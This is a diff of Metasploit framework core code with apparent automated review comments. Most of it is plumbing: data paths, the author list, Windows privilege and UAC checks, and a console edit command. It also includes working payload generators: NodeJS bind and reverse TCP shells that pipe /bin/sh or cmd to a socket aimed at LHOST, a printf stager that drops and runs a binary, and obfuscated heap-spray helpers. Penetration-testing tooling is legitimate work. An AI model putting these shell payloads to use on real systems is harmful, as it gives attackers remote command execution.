classpath += ":" + datastore['ADDCLASSPATH'] if datastore['ADDCLASSPATH']


@ -1,19 +0,0 @@
module Msf
module Exploit::Local::Unix
include Exploit::Local::CompileC
def unix_socket_h(metasm_exe)
[
"external/source/meterpreter/source/bionic/libc/include/sys/socket.h",
].each do |fname|
cparser.parse(File.read(fname), fname)
end
end
end
end


@ -26,6 +26,7 @@ require 'msf/core/exploit/cmdstager_debug_asm'
require 'msf/core/exploit/cmdstager_tftp'
require 'msf/core/exploit/cmdstager_bourne'
require 'msf/core/exploit/cmdstager_echo'
require 'msf/core/exploit/cmdstager_printf'
# Protocol
require 'msf/core/exploit/tcp'


@ -75,7 +75,7 @@ module Exploit::Remote::MSSQL
register_advanced_options(
[
OptPath.new('HEX2BINARY', [ false, "The path to the hex2binary script on the disk",
File.join(Msf::Config.install_root, "data", "exploits", "mssql", "h2b")
File.join(Msf::Config.data_directory, "exploits", "mssql", "h2b")
]),
OptString.new('DOMAIN', [ true, 'The domain to use for windows authentication', 'WORKSTATION'])
], Msf::Exploit::Remote::MSSQL)


@ -34,7 +34,7 @@ module Exploit::Remote::MSSQL_SQLI
register_advanced_options(
[
OptPath.new('HEX2BINARY', [ false, "The path to the hex2binary script on the disk",
File.join(Msf::Config.install_root, "data", "exploits", "mssql", "h2b")
File.join(Msf::Config.data_directory, "exploits", "mssql", "h2b")
])
], Msf::Exploit::Remote::MSSQL_SQLI)


@ -150,7 +150,7 @@ module Exploit::Remote::MYSQL
def mysql_upload_sys_udf(arch=:win32,target_path=nil)
fname = (arch == :win32 ? "lib_mysqludf_sys_32.dll" : "lib_mysqludf_sys_64.dll")
sys_dll = File.join( Msf::Config.install_root, "data", "exploits", "mysql", fname )
sys_dll = File.join( Msf::Config.data_directory, "exploits", "mysql", fname )
data = File.open(sys_dll, "rb") {|f| f.read f.stat.size}
blob = "0x"
blob << data.unpack("C*").map {|x| "%02x" % [x]}.join


@ -116,7 +116,7 @@ module Exploit::Powershell
ps_wrapper = <<EOS
$si = New-Object System.Diagnostics.ProcessStartInfo
$si.FileName = "#{ps_bin}"
$si.FileName = #{ps_bin}
$si.Arguments = '#{ps_args}'
$si.UseShellExecute = $false
$si.RedirectStandardOutput = $true
@ -146,11 +146,11 @@ EOS
psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
end
# Determine appropriate architecture
ps_bin = wow64 ? '$env:windir\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
ps_bin = wow64 ? '$env:windir+\'\syswow64\WindowsPowerShell\v1.0\powershell.exe\'' : '\'powershell.exe\''
# Wrap in hidden runtime
psh_payload = run_hidden_psh(psh_payload,ps_bin)
# Convert to base64 for -encodedcommand execution
command = "%COMSPEC% /B /C start powershell.exe -Command \"#{psh_payload.gsub("\n",';').gsub('"','\"')}\"\r\n"
command = "%COMSPEC% /B /C start powershell.exe -Command #{psh_payload.gsub("\n",';').gsub('"','\"')}\r\n"
end
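Review bot: Removing the double quotes around the `-Command` argument on the last changed line means cmd.exe now tokenises the PowerShell text itself, so any `|`, `&`, `<`, `>` or `^` emitted by the wrapper (most of `run_hidden_psh` and the callers' payloads are outside this hunk) is consumed by cmd.exe instead of reaching PowerShell, and the `\"` produced by `.gsub('"','\"')` is left over from the quoted form. If the quotes were dropped to accommodate the now single-quoted `ps_bin` values, it would be worth confirming that no generated payload contains cmd metacharacters, or keeping the outer quotes and escaping only the inner ones; a comment stating the assumption, e.g. `# NOTE: unquoted -Command, payload text must contain no cmd.exe metacharacters`, would make the constraint visible. Separately, `$si.Arguments = '#{ps_args}'` wraps `ps_args` in PowerShell single quotes, so any `'` inside the arguments breaks the wrapper; doubling it with `ps_args.gsub("'", "''")` is the PowerShell-correct escape.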
#


@ -150,7 +150,7 @@ module Exploit::Remote::SunRPC
end
def progresolv(number)
names = File.join(Msf::Config.install_root, "data", "wordlists", "rpc_names.txt")
names = File.join(Msf::Config.data_directory, "wordlists", "rpc_names.txt")
File.open(names, "rb").each_line do |line|
next if line.empty? || line =~ /^\s*#/


@ -12,39 +12,40 @@ class Msf::Module::Author
# A hash of known author names
Known =
{
'hdm' => 'hdm' + 0x40.chr + 'metasploit.com',
'spoonm' => 'spoonm' + 0x40.chr + 'no$email.com',
'skape' => 'mmiller' + 0x40.chr + 'hick.org',
'vlad902' => 'vlad902' + 0x40.chr + 'gmail.com',
'optyx' => 'optyx' + 0x40.chr + 'no$email.com',
'anonymous' => 'anonymous-contributor' + 0x40.chr + 'metasploit.com',
'stinko' => 'vinnie' + 0x40.chr + 'metasploit.com',
'MC' => 'mc' + 0x40.chr + 'metasploit.com',
'cazz' => 'bmc' + 0x40.chr + 'shmoo.com',
'pusscat' => 'pusscat' + 0x40.chr + 'metasploit.com',
'skylined' => 'skylined' + 0x40.chr + 'edup.tudelft.nl',
'patrick' => 'patrick' + 0x40.chr + 'osisecurity.com.au',
'Ramon de C Valle' => 'rcvalle' + 0x40.chr + 'metasploit.com',
'I)ruid' => 'druid' + 0x40.chr + 'caughq.org',
'egypt' => 'egypt' + 0x40.chr + 'metasploit.com',
'kris katterjohn' => 'katterjohn' + 0x40.chr + 'gmail.com',
'CG' => 'cg' + 0x40.chr + 'carnal0wnage.com',
'et' => 'et' + 0x40.chr + 'metasploit.com',
'sf' => 'stephen_fewer' + 0x40.chr + 'harmonysecurity.com',
'kf' => 'kf_list' + 0x40.chr + 'digitalmunition.com',
'ddz' => 'ddz' + 0x40.chr + 'theta44.org',
'jduck' => 'jduck' + 0x40.chr + 'metasploit.com',
'natron' => 'natron' + 0x40.chr + 'metasploit.com',
'todb' => 'todb' + 0x40.chr + 'metasploit.com',
'msmith' => 'msmith' + 0x40.chr + 'metasploit.com',
'jcran' => 'jcran' + 0x40.chr + 'metasploit.com',
'sinn3r' => 'sinn3r' + 0x40.chr + 'metasploit.com',
'bannedit' => 'bannedit' + 0x40.chr + 'metasploit.com',
'amaloteaux' => 'alex_maloteaux' + 0x40.chr + 'metasploit.com',
'anonymous' => 'anonymous-contributor' + 0x40.chr + 'metasploit.com',
'bannedit' => 'bannedit' + 0x40.chr + 'metasploit.com',
'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com',
'cazz' => 'bmc' + 0x40.chr + 'shmoo.com',
'CG' => 'cg' + 0x40.chr + 'carnal0wnage.com',
'ddz' => 'ddz' + 0x40.chr + 'theta44.org',
'egypt' => 'egypt' + 0x40.chr + 'metasploit.com',
'et' => 'et' + 0x40.chr + 'metasploit.com',
'hdm' => 'hdm' + 0x40.chr + 'metasploit.com',
'I)ruid' => 'druid' + 0x40.chr + 'caughq.org',
'jcran' => 'jcran' + 0x40.chr + 'metasploit.com',
'jduck' => 'jduck' + 0x40.chr + 'metasploit.com',
'joev' => 'joev' + 0x40.chr + 'metasploit.com',
'juan vazquez' => 'juan.vazquez' + 0x40.chr + 'metasploit.com',
'kf' => 'kf_list' + 0x40.chr + 'digitalmunition.com',
'kris katterjohn' => 'katterjohn' + 0x40.chr + 'gmail.com',
'MC' => 'mc' + 0x40.chr + 'metasploit.com',
'msmith' => 'msmith' + 0x40.chr + 'metasploit.com',
'mubix' => 'mubix' + 0x40.chr + 'hak5.org',
'natron' => 'natron' + 0x40.chr + 'metasploit.com',
'optyx' => 'optyx' + 0x40.chr + 'no$email.com',
'patrick' => 'patrick' + 0x40.chr + 'osisecurity.com.au',
'pusscat' => 'pusscat' + 0x40.chr + 'metasploit.com',
'Ramon de C Valle' => 'rcvalle' + 0x40.chr + 'metasploit.com',
'sf' => 'stephen_fewer' + 0x40.chr + 'harmonysecurity.com',
'sinn3r' => 'sinn3r' + 0x40.chr + 'metasploit.com',
'skape' => 'mmiller' + 0x40.chr + 'hick.org',
'skylined' => 'skylined' + 0x40.chr + 'edup.tudelft.nl',
'spoonm' => 'spoonm' + 0x40.chr + 'no$email.com',
'stinko' => 'vinnie' + 0x40.chr + 'metasploit.com',
'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com',
'mubix' => 'mubix' + 0x40.chr + 'hak5.org'
'todb' => 'todb' + 0x40.chr + 'metasploit.com',
'vlad902' => 'vlad902' + 0x40.chr + 'gmail.com'
}
#


@ -112,6 +112,8 @@ class Msf::Module::SiteReference < Msf::Module::Reference
self.site = 'http://www.kb.cert.org/vuls/id/' + in_ctx_val.to_s
elsif (in_ctx_id == 'BPS')
self.site = 'https://strikecenter.bpointsys.com/bps/advisory/BPS-' + in_ctx_val.to_s
elsif (in_ctx_id == 'ZDI')
self.site = 'http://www.zerodayinitiative.com/advisories/ZDI-' + in_ctx_val.to_s
elsif (in_ctx_id == 'URL')
self.site = in_ctx_val.to_s
else


@ -0,0 +1,70 @@
# -*- coding: binary -*-
require 'msf/core'
module Msf::Payload::NodeJS
# Outputs a javascript snippet that spawns a bind TCP shell
# @return [String] javascript code that executes bind TCP payload
def nodejs_bind_tcp
cmd = <<-EOS
(function(){
var require = global.require || global.process.mainModule.constructor._load;
if (!require) return;
var cmd = (global.process.platform.match(/^win/i)) ? "cmd" : "/bin/sh";
var net = require("net"),
cp = require("child_process"),
util = require("util");
var server = net.createServer(function(socket) {
var sh = cp.spawn(cmd, []);
socket.pipe(sh.stdin);
util.pump(sh.stdout, socket);
util.pump(sh.stderr, socket);
});
server.listen(#{datastore['LPORT']});
})();
EOS
cmd.gsub("\n",'').gsub(/\s+/,' ').gsub(/[']/, '\\\\\'')
end
# Outputs a javascript snippet that spawns a reverse TCP shell
# @param [Hash] opts the options to create the reverse TCP payload with
# @option opts [Boolean] :use_ssl use SSL when communicating with the shell. defaults to false.
# @return [String] javascript code that executes reverse TCP payload
def nodejs_reverse_tcp(opts={})
use_ssl = opts.fetch(:use_ssl, false)
tls_hash = if use_ssl then '{rejectUnauthorized:false}, ' else '' end
net_lib = if use_ssl then 'tls' else 'net' end
lhost = Rex::Socket.is_ipv6?(lhost) ? "[#{datastore['LHOST']}]" : datastore['LHOST']
# the global.process.mainModule.constructor._load fallback for require() is
# handy when the payload is eval()'d into a sandboxed context: the reference
# to 'require' is missing, but can be looked up from the 'global' object.
#
# however, this fallback might break in later versions of nodejs.
cmd = <<-EOS
(function(){
var require = global.require || global.process.mainModule.constructor._load;
if (!require) return;
var cmd = (global.process.platform.match(/^win/i)) ? "cmd" : "/bin/sh";
var net = require("#{net_lib}"),
cp = require("child_process"),
util = require("util"),
sh = cp.spawn(cmd, []);
var client = this;
client.socket = net.connect(#{datastore['LPORT']}, "#{lhost}", #{tls_hash} function() {
client.socket.pipe(sh.stdin);
util.pump(sh.stdout, client.socket);
util.pump(sh.stderr, client.socket);
});
})();
EOS
cmd.gsub("\n",'').gsub(/\s+/,' ').gsub(/[']/, '\\\\\'')
end
# Wraps the javascript code param in a "node" command invocation
# @param [String] code the javascript code to run
# @return [String] a command that invokes "node" and passes the code
def nodejs_cmd(code)
"node -e 'eval(\"#{Rex::Text.to_hex(code, "\\x")}\");'"
end
end
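Review bot: In `nodejs_reverse_tcp` the line `lhost = Rex::Socket.is_ipv6?(lhost) ? "[#{datastore['LHOST']}]" : datastore['LHOST']` tests the local variable it is assigning, which Ruby has already created and set to `nil` when the right-hand side runs, so the IPv6 check always sees `nil` and an IPv6 LHOST is never bracketed; it should read `lhost = Rex::Socket.is_ipv6?(datastore['LHOST']) ? "[#{datastore['LHOST']}]" : datastore['LHOST']` (whether Node's `net.connect` wants the literal bracketed at all is a separate point worth checking). The `tls` variant connects with `{rejectUnauthorized:false}`, which is expected for a handler presenting a generated certificate but deserves a comment such as `# no certificate validation: the handler's cert is self-signed`. `util.pump` is deprecated in later Node releases in favour of `stream.pipe`, so `sh.stdout.pipe(socket)` would be more durable, though I cannot tell from this file which Node versions are targeted.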


@ -1,9 +1,30 @@
# -*- coding: binary -*-
require 'msf/core/post/windows/accounts'
require 'msf/core/post/windows/registry'
module Msf::Post::Windows::Priv
include ::Msf::Post::Windows::Accounts
include Msf::Post::Windows::Registry
INTEGRITY_LEVEL_SID = {
:low => 'S-1-16-4096',
:medium => 'S-1-16-8192',
:high => 'S-1-16-12288',
:system => 'S-1-16-16384'
}
SYSTEM_SID = 'S-1-5-18'
ADMINISTRATORS_SID = 'S-1-5-32-544'
# http://technet.microsoft.com/en-us/library/dd835564(v=ws.10).aspx
# ConsentPromptBehaviorAdmin
UAC_NO_PROMPT = 0
UAC_PROMPT_CREDS_IF_SECURE_DESKTOP = 1
UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP = 2
UAC_PROMPT_CREDS = 3
UAC_PROMPT_CONSENT = 4
UAC_DEFAULT = 5
#
# Returns true if user is admin and false if not.
@ -13,34 +34,48 @@ module Msf::Post::Windows::Priv
# Assume true if the OS doesn't expose this (Windows 2000)
session.railgun.shell32.IsUserAnAdmin()["return"] rescue true
else
cmd = "cmd.exe /c reg query HKU\\S-1-5-19"
results = session.shell_command_token_win32(cmd)
if results =~ /Error/
return false
else
local_service_key = registry_enumkeys('HKU\S-1-5-19')
if local_service_key
return true
else
return false
end
end
end
#
# Returns true if in the administrator group
#
def is_in_admin_group?
whoami = get_whoami
if whoami.nil?
print_error("Unable to identify admin group membership")
return nil
elsif whoami.include? ADMINISTRATORS_SID
return true
else
return false
end
end
#
# Returns true if running as Local System
#
def is_system?
if session_has_ext
local_sys = resolve_sid("S-1-5-18")
local_sys = resolve_sid(SYSTEM_SID)
if session.sys.config.getuid == "#{local_sys[:domain]}\\#{local_sys[:name]}"
return true
else
return false
end
else
cmd = "cmd.exe /c reg query HKLM\\SAM\\SAM"
results = session.shell_command_token_win32(cmd)
if results =~ /Error/
return false
else
results = registry_enumkeys('HKLM\SAM\SAM')
if results
return true
else
return false
end
end
end
@ -55,24 +90,80 @@ module Msf::Post::Windows::Priv
uac = false
winversion = session.sys.config.sysinfo['OS']
if winversion =~ /Windows (Vista|7|2008)/
if session.sys.config.getuid != "NT AUTHORITY\\SYSTEM"
if winversion =~ /Windows (Vista|7|8|2008)/
unless is_system?
begin
key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System',KEY_READ)
if key.query_value('EnableLUA').data == 1
uac = true
end
key.close
rescue::Exception => e
print_error("Error Checking UAC: #{e.class} #{e}")
enable_lua = registry_getvaldata(
'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System',
'EnableLUA'
)
uac = (enable_lua == 1)
rescue Rex::Post::Meterpreter::RequestError => e
print_error("Error Checking if UAC is Enabled: #{e.class} #{e}")
end
end
end
return uac
end
#
# Returns the UAC Level
#
# @see http://technet.microsoft.com/en-us/library/dd835564(v=ws.10).aspx
# 2 - Always Notify, 5 - Default, 0 - Disabled
#
def get_uac_level
begin
uac_level = registry_getvaldata(
'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System',
'ConsentPromptBehaviorAdmin'
)
rescue Rex::Post::Meterpreter::RequestError => e
print_error("Error Checking UAC Level: #{e.class} #{e}")
end
if uac_level
return uac_level
else
return nil
end
end
#
# Returns the Integrity Level
#
def get_integrity_level
whoami = get_whoami
if whoami.nil?
print_error("Unable to identify integrity level")
return nil
else
INTEGRITY_LEVEL_SID.each_pair do |k,sid|
if whoami.include? sid
return sid
end
end
end
end
#
# Returns the output of whoami /groups
#
# Returns nil if Windows whoami is not available
#
def get_whoami
whoami = cmd_exec('cmd.exe /c whoami /groups')
if whoami.nil? or whoami.empty?
return nil
elsif whoami =~ /is not recognized/ or whoami =~ /extra operand/ or whoami =~ /Access is denied/
return nil
else
return whoami
end
end
#
# Return true if the session has extended capabilities (ie meterpreter)
#
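Review bot: `get_integrity_level` falls off the end of `INTEGRITY_LEVEL_SID.each_pair` when no integrity SID appears in the `whoami /groups` output, and because that call is the last expression of the `else` branch the method then returns the `INTEGRITY_LEVEL_SID` hash itself rather than `nil`; add an explicit `nil` after the loop, or replace it with `INTEGRITY_LEVEL_SID.values.find { |sid| whoami.include?(sid) }`. `is_in_admin_group?` matches `S-1-5-32-544` anywhere in `whoami /groups`, but on a UAC-filtered token that group is still listed (marked deny-only), so a true result means membership, not an elevated token; a comment such as `# membership only: a filtered (UAC) token still lists the group as deny-only` would stop callers treating it like `is_admin?`. The `is_uac_enabled?` check `/Windows (Vista|7|8|2008)/` does not match Server 2012, so UAC is reported disabled there; worth confirming the intended platform list.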


@ -107,6 +107,7 @@ class Core
"connect" => "Communicate with a host",
"color" => "Toggle color",
"exit" => "Exit the console",
"edit" => "Edit the current module with $VISUAL or $EDITOR",
"go_pro" => "Launch Metasploit web GUI",
"grep" => "Grep the output of another command",
"help" => "Help menu",
@ -627,6 +628,37 @@ class Core
true
end
def local_editor
Rex::Compat.getenv('VISUAL') || Rex::Compat.getenv('EDITOR') || '/usr/bin/vim'
end
def cmd_edit_help
msg = "Edit the currently active module"
msg = "#{msg} #{local_editor ? "with #{local_editor}" : "($VISUAL or $EDITOR must be set first)"}."
print_line "Usage: edit"
print_line
print_line msg
print_line "When done editing, you must reload the module with 'reload' or 'rexploit'."
print_line
end
#
# Edit the currently active module
#
def cmd_edit
unless local_editor
print_error "$VISUAL or $EDITOR must be set first. Try 'export EDITOR=/usr/bin/vim'"
return
end
if active_module
path = active_module.file_path
print_status "Launching #{local_editor} #{path}"
system(local_editor,path)
else
print_error "Nothing to edit -- try using a module first."
end
end
#
# Instructs the driver to stop executing.
#
@ -989,7 +1021,7 @@ class Core
def cmd_load_help
print_line "Usage: load <path> [var=val var=val ...]"
print_line
print_line "Loads a plugin from the supplied path. If path is not absolute, fist looks"
print_line "Loads a plugin from the supplied path. If path is not absolute, first looks"
print_line "in the user's plugin directory (#{Msf::Config.user_plugin_directory}) then"
print_line "in the framework root plugin directory (#{Msf::Config.plugin_directory})."
print_line "The optional var=val options are custom parameters that can be passed to plugins."
@ -3081,14 +3113,14 @@ class Core
'Columns' => columns
)
[
[ 'ConsoleLogging', framework.datastore['ConsoleLogging'] || '', 'Log all console input and output' ],
[ 'LogLevel', framework.datastore['LogLevel'] || '', 'Verbosity of logs (default 0, max 5)' ],
[ 'MinimumRank', framework.datastore['MinimumRank'] || '', 'The minimum rank of exploits that will run without explicit confirmation' ],
[ 'SessionLogging', framework.datastore['SessionLogging'] || '', 'Log all input and output for sessions' ],
[ 'TimestampOutput', framework.datastore['TimestampOutput'] || '', 'Prefix all console output with a timestamp' ],
[ 'Prompt', framework.datastore['Prompt'] || '', "The prompt string, defaults to \"#{Msf::Ui::Console::Driver::DefaultPrompt}\"" ],
[ 'PromptChar', framework.datastore['PromptChar'] || '', "The prompt character, defaults to \"#{Msf::Ui::Console::Driver::DefaultPromptChar}\"" ],
[ 'PromptTimeFormat', framework.datastore['PromptTimeFormat'] || '', 'A format for timestamp escapes in the prompt, see ruby\'s strftime docs' ],
[ 'ConsoleLogging', framework.datastore['ConsoleLogging'] || "false", 'Log all console input and output' ],
[ 'LogLevel', framework.datastore['LogLevel'] || "0", 'Verbosity of logs (default 0, max 5)' ],
[ 'MinimumRank', framework.datastore['MinimumRank'] || "0", 'The minimum rank of exploits that will run without explicit confirmation' ],
[ 'SessionLogging', framework.datastore['SessionLogging'] || "false", 'Log all input and output for sessions' ],
[ 'TimestampOutput', framework.datastore['TimestampOutput'] || "false", 'Prefix all console output with a timestamp' ],
[ 'Prompt', framework.datastore['Prompt'] || Msf::Ui::Console::Driver::DefaultPrompt.to_s.gsub(/%.../,"") , "The prompt string" ],
[ 'PromptChar', framework.datastore['PromptChar'] || Msf::Ui::Console::Driver::DefaultPromptChar.to_s.gsub(/%.../,""), "The prompt character" ],
[ 'PromptTimeFormat', framework.datastore['PromptTimeFormat'] || Time::DATE_FORMATS[:db].to_s, 'Format for timestamp escapes in prompts' ],
].each { |r| tbl << r }
print(tbl.to_s)
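Review bot: The `unless local_editor` guard in `cmd_edit` and the `($VISUAL or $EDITOR must be set first)` branch of `cmd_edit_help` are dead code, because `local_editor` falls back to `'/usr/bin/vim'` and never returns nil; the failures that can really happen — the fallback binary missing, or an `$EDITOR` value that carries arguments such as `code --wait`, which `system(local_editor, path)` treats as a single executable name — go unreported because the nil/false return of `system` is ignored. Keep the argv form (it deliberately avoids a shell, so the module path is never shell-interpreted) but split the editor string and check the result: `ok = system(*Shellwords.split(local_editor), path)` followed by `print_error("Could not launch #{local_editor}") unless ok`, adding `require 'shellwords'` if core.rb does not already load it (not visible here). Whatever `$EDITOR` names runs with msfconsole's privileges, which is the user's own choice, but a one-line comment over `cmd_edit` saying so is cheap. The `Core` class continues outside these hunks.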

8
lib/msf/util/exe.rb Executable file → Normal file

@ -824,8 +824,8 @@ def self.to_vba(framework,code,opts={})
persist = opts[:persist] || false
hash_sub = {}
hash_sub[:var_shellcode] = ""
hash_sub[:var_bytes] = Rex::Text.rand_text_alpha(rand(4)+4) # repeated a large number of times, so keep this one small
hash_sub[:var_shellcode] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:exe_filename] = Rex::Text.rand_text_alpha(rand(8)+8) << '.exe'
hash_sub[:var_fname] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_func] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_stream] = Rex::Text.rand_text_alpha(rand(8)+8)
@ -835,7 +835,7 @@ def self.to_vba(framework,code,opts={})
hash_sub[:var_tempexe] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_shellcode] = Rex::Text.to_vbscript(exes, hash_sub[:var_bytes])
hash_sub[:hex_shellcode] = exes.unpack('H*').join('')
hash_sub[:init] = ""
@ -910,7 +910,7 @@ def self.to_vba(framework,code,opts={})
hash_sub[:var_compileParams] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_syscode] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:shellcode] = Rex::Text.to_powershell(code, hash_sub[:var_code])
hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)
return read_replace_script_template("to_mem_dotnet.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
end


@ -7,3 +7,4 @@ require 'rex/exploitation/cmdstager/debug_asm'
require 'rex/exploitation/cmdstager/tftp'
require 'rex/exploitation/cmdstager/bourne'
require 'rex/exploitation/cmdstager/echo'
require 'rex/exploitation/cmdstager/printf'


@ -0,0 +1,122 @@
# -*- coding: binary -*-
require 'rex/text'
require 'rex/arch'
require 'msf/core/framework'
require 'shellwords'
module Rex
module Exploitation
class CmdStagerPrintf < CmdStagerBase
def initialize(exe)
super
@var_elf = Rex::Text.rand_text_alpha(5)
end
#
# Override to ensure opts[:temp] is a correct *nix path
#
def generate(opts = {})
opts[:temp] = opts[:temp] || '/tmp/'
opts[:temp].gsub!(/\\/, '/')
opts[:temp] = opts[:temp].shellescape
opts[:temp] << '/' if opts[:temp][-1,1] != '/'
super
end
#
# Override to set the extra byte count
#
def generate_cmds(opts)
if opts[:noquotes]
@cmd_start = "printf "
@cmd_end = ">>#{@tempdir}#{@var_elf}"
@prefix = '\\\\'
min_part_size = 5
else
@cmd_start = "printf '"
@cmd_end = "'>>#{@tempdir}#{@var_elf}"
@prefix = '\\'
min_part_size = 4
end
xtra_len = @cmd_start.length + @cmd_end.length
opts.merge!({ :extra => xtra_len })
if (opts[:linemax] - opts[:extra]) < min_part_size
raise RuntimeError, "Not enough space for command - #{opts[:extra] + min_part_size} byte required, #{opts[:linemax]} byte available"
end
super
end
#
# Encode into a "\12\345" octal format that printf understands
#
def encode_payload(opts)
return Rex::Text.to_octal(@exe, @prefix)
end
#
# Override it to ensure that the octal representation of a byte isn't cut
#
def slice_up_payload(encoded, opts)
encoded_dup = encoded.dup
parts = []
xtra_len = opts[:extra]
xtra_len ||= 0
while (encoded_dup.length > 0)
temp = encoded_dup.slice(0, (opts[:linemax] - xtra_len))
# remove the last octal escape if it is imcomplete
if encoded_dup.length > temp.length and encoded_dup[temp.length, @prefix.length] != @prefix
pos = temp.rindex('\\')
pos -= 1 if temp[pos-1] == '\\'
temp.slice!(pos..temp.length-1)
end
parts << temp
encoded_dup.slice!(0, temp.length)
end
parts
end
#
# Combine the parts of the encoded file with the stuff that goes
# before and after it.
#
def parts_to_commands(parts, opts)
parts.map do |p|
@cmd_start + p + @cmd_end
end
end
#
# Since the binary has been already dropped to disk, just execute and
# delete it
#
def generate_cmds_decoder(opts)
cmds = []
# Make it all happen
cmds << "chmod +x #{@tempdir}#{@var_elf}"
cmds << "#{@tempdir}#{@var_elf}"
# Clean up after unless requested not to..
unless opts[:nodelete]
cmds << "rm -f #{@tempdir}#{@var_elf}"
end
return cmds
end
def cmd_concat_operator
" ; "
end
end
end
end
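Review bot: `slice_up_payload` assumes every slice holds a backslash and that trimming the incomplete escape leaves something behind: `temp.rindex('\\')` returning nil raises NoMethodError on `pos -= 1`, and if `pos` ends up 0 the slice is emptied, `encoded_dup.slice!(0, 0)` makes no progress and the `while` loop never terminates. That is held off only by the `min_part_size` check in the separate `generate_cmds`, so the method should defend itself, e.g. `raise RuntimeError, "linemax too small for an octal escape" if pos.nil? || pos.zero?` before the `slice!`. Separately, `generate` mutates the caller's `opts[:temp]` in place through `gsub!`, which surprises callers that pass a datastore value and raises on a frozen string; `opts[:temp] = (opts[:temp] || '/tmp/').gsub(/\\/, '/').shellescape` avoids both. Also note that with `" ; "` as the concat operator the `rm -f` only runs after the dropped ELF exits, so a foreground payload leaves the artifact on disk for its whole lifetime — worth a comment on `generate_cmds_decoder` if that is intended.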


@ -1,43 +0,0 @@
# -*- coding: binary -*-
require 'msf/core'
require 'rex/text'
require 'rex/exploitation/jsobfu'
module Rex
module Exploitation
#
# Provides several javascript functions for determining the OS and browser versions of a client.
#
# getVersion(): returns an object with the following properties
# os_name - OS name, one of the Msf::OperatingSystems constants
# os_flavor - OS flavor as a string (e.g.: "XP", "2000")
# os_sp - OS service pack (e.g.: "SP2", will be empty on non-Windows)
# os_lang - OS language (e.g.: "en-us")
# ua_name - Client name, one of the Msf::HttpClients constants
# ua_version - Client version as a string (e.g.: "3.5.1", "6.0;SP2")
# arch - Architecture, one of the ARCH_* constants
#
# The following functions work on the version returned in obj.ua_version
#
# ua_ver_cmp(a, b): returns -1, 0, or 1 based on whether a < b, a == b, or a > b respectively
# ua_ver_lt(a, b): returns true if a < b
# ua_ver_gt(a, b): returns true if a > b
# ua_ver_eq(a, b): returns true if a == b
#
class JavascriptOSDetect < JSObfu
def initialize(custom_js = '', opts = {})
@js = custom_js
@js += ::File.read(::File.join(::File.dirname(__FILE__), "javascriptosdetect.js"))
super @js
return @js
end
end
end
end


@ -0,0 +1,6 @@
# -*- coding: binary -*-
require 'rex/exploitation/js/memory'
require 'rex/exploitation/js/network'
require 'rex/exploitation/js/utils'
require 'rex/exploitation/js/detect'


@ -0,0 +1,56 @@
# -*- coding: binary -*-
require 'msf/core'
require 'rex/text'
require 'rex/exploitation/jsobfu'
module Rex
module Exploitation
module Js
class Detect
#
# Provides several javascript functions for determining the OS and browser versions of a client.
#
# getVersion(): returns an object with the following properties
# os_name - OS name, one of the Msf::OperatingSystems constants
# os_flavor - OS flavor as a string (e.g.: "XP", "2000")
# os_sp - OS service pack (e.g.: "SP2", will be empty on non-Windows)
# os_lang - OS language (e.g.: "en-us")
# ua_name - Client name, one of the Msf::HttpClients constants
# ua_version - Client version as a string (e.g.: "3.5.1", "6.0;SP2")
# arch - Architecture, one of the ARCH_* constants
#
# The following functions work on the version returned in obj.ua_version
#
# ua_ver_cmp(a, b): returns -1, 0, or 1 based on whether a < b, a == b, or a > b respectively
# ua_ver_lt(a, b): returns true if a < b
# ua_ver_gt(a, b): returns true if a > b
# ua_ver_eq(a, b): returns true if a == b
#
def self.os(custom_js = '')
js = custom_js
js << ::File.read(::File.join(Msf::Config.data_directory, "js", "detect", "os.js"))
Rex::Exploitation::JSObfu.new(js)
end
#
# Provides javascript functions to determine addon information.
#
# getMsOfficeVersion(): Returns the version for Microsoft Office
#
def self.addons(custom_js = '')
js = custom_js
js << ::File.read(::File.join(Msf::Config.data_directory, "js", "detect", "addons.js"))
Rex::Exploitation::JSObfu.new(js)
end
end
end
end
end
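Review bot: Both `self.os` and `self.addons` append to their argument in place — `js = custom_js` aliases the caller's string and `js << ::File.read(...)` mutates it — so a caller that passes a reusable string gets the detection library appended to it as a side effect, and a frozen string raises; the removed `JavascriptOSDetect` used `+=`, which did not have this problem. Use `js = custom_js + ::File.read(...)` (or `custom_js.dup` first) in both methods. A short doc comment stating that these return a `JSObfu` instance rather than a string, unlike the `Memory`/`Network`/`Utils` helpers added alongside, would also save callers a surprise.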


@ -0,0 +1,52 @@
# -*- coding: binary -*-
require 'msf/core'
module Rex
module Exploitation
module Js
#
# Provides meomry manipulative functions in JavaScript
#
class Memory
def self.mstime_malloc
js = ::File.read(::File.join(Msf::Config.data_directory, "js", "memory", "mstime_malloc.js"))
js = js.gsub(/W00TA/, Rex::Text.rand_text_hex(6))
js = js.gsub(/W00TB/, Rex::Text.rand_text_hex(5))
::Rex::Exploitation::ObfuscateJS.new(js,
{
'Symbols' => {
'Variables' => %w{ buf eleId acTag }
}
}).obfuscate
end
def self.property_spray
js = ::File.read(::File.join(Msf::Config.data_directory, "js", "memory", "property_spray.js"))
::Rex::Exploitation::ObfuscateJS.new(js,
{
'Symbols' => {
'Variables' => %w{ sym_div_container data junk obj }
}
}).obfuscate
end
def self.heap_spray
js = ::File.read(::File.join(Msf::Config.data_directory, "js", "memory", "heap_spray.js"))
::Rex::Exploitation::ObfuscateJS.new(js,
{
'Symbols' => {
'Variables' => %w{ index heapSprayAddr_hi heapSprayAddr_lo retSlide heapBlockCnt }
}
}).obfuscate
end
end
end
end
end
